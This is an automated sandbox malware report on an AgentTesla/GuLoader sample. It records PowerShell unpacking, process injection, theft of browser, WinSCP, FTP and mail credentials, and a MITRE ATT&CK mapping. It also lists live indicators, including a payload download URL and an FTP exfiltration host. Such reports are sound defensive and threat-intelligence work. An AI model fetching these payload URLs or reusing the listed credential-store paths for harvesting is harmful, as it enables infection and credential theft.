            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 2124, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 2124, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 2124, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation            		1
            DLL Side-Loading            		111
            Process Injection            		11
            Masquerading            		2
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            Credentials in Registry            		1
            Process Discovery            		Remote Desktop Protocol2
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
            Virtualization/Sandbox Evasion            		Security Account Manager151
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync124
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518114 Sample: Ze1Ueabtx5.img Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 33 ftp.concaribe.com 2->33 35 concaribe.com 2->35 37 api.ipify.org 2->37 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 Yara detected GuLoader 2->49 51 5 other signatures 2->51 8 Documenti di spedizione 0009333000459595995.exe 1 23 2->8         started        11 cmd.exe 2 2->11         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->27 dropped 13 powershell.exe 19 8->13         started        17 powershell.exe 41 11->17         started        19 conhost.exe 11->19         started        process6 file7 29 Documenti di spedi...333000459595995.exe, PE32 13->29 dropped 61 Writes to foreign memory regions 13->61 21 wabmig.exe 15 8 13->21         started        25 conhost.exe 13->25         started        31 Documenti di spedi...333000459595995.exe, PE32 17->31 dropped 63 Found suspicious powershell code related to unpacking or dynamic code loading 17->63 65 Loading BitLocker PowerShell Module 17->65 67 Powershell drops PE file 17->67 signatures8 process9 dnsIp10 39 concaribe.com 192.185.13.234, 21, 49739 UNIFIEDLAYER-AS-1US United States 21->39 41 185.29.11.53, 49737, 80 DATACLUB-NL European Union 21->41 43 api.ipify.org 172.67.74.152, 443, 49738 CLOUDFLARENETUS United States 21->43 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->53 55 Tries to steal Mail credentials (via file / registry access) 21->55 57 Tries to harvest and steal ftp login credentials 21->57 59 Tries to harvest and steal browser information (history, passwords, etc) 21->59 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Ze1Ueabtx5.img5%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe8%ReversingLabs
            \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe8%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://185.29.11.53/bIGuEflfnZjESw74.binf;c0%Avira URL Cloudsafe
            http://crl.micro0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            http://ftp.concaribe.com100%Avira URL Cloudmalware
            http://185.29.11.53/bIGuEflfnZjESw74.bin0%Avira URL Cloudsafe
            https://api.ipify.org/t0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://concaribe.com0%Avira URL Cloudsafe
            http://185.29.11.53/bIGuEflfnZjESw74.binj;W0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            		172.67.74.152
            		truefalse
              		unknown
              concaribe.com
              		192.185.13.234
              		truetrue
                		unknown
                ftp.concaribe.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                  • URL Reputation: safe
                  		unknown
                  http://185.29.11.53/bIGuEflfnZjESw74.binfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.ipify.orgwabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://185.29.11.53/bIGuEflfnZjESw74.binf;cwabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.micropowershell.exe, 00000006.00000002.2460083974.00000000031B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ftp.concaribe.comwabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorErrorDocumenti di spedizione 0009333000459595995.exe, 00000005.00000002.1792758613.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Documenti di spedizione 0009333000459595995.exe, 00000005.00000000.1768071577.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ze1Ueabtx5.img, Documenti di spedizione 0009333000459595995.exe.2.dr, Documenti di spedizione 0009333000459595995.exe.6.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://concaribe.comwabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org/twabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.29.11.53/bIGuEflfnZjESw74.binj;Wwabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.29.11.53
                  		unknownEuropean Union
                  		203557DATACLUB-NLfalse
                  192.185.13.234
                  		concaribe.comUnited States
                  		46606UNIFIEDLAYER-AS-1UStrue
                  172.67.74.152
                  		api.ipify.orgUnited States
                  		13335CLOUDFLARENETUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518114
                  Start date and time:2024-09-25 12:33:39 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 36s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:2
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Ze1Ueabtx5.img
                  renamed because original name is a hash value
                  Original Sample Name:2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096.unknown
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winIMG@10/18@2/3

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, WMIADAP.exe, SIHClient.exe, conhost.exe, fsdepends.sys
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Ze1Ueabtx5.img

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  06:34:35API Interceptor67x Sleep call for process: powershell.exe modified
                  06:35:50API Interceptor1664x Sleep call for process: wabmig.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.29.11.53Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.53/bIGuEflfnZjESw74.bin
                  192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                  172.67.74.152file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  zE7Ken4cFt.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  FormPlayer.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  api.ipify.orgDocumenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 104.26.13.205
                  rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                  • 104.26.12.205
                  reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                  • 104.26.13.205
                  COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.12.205
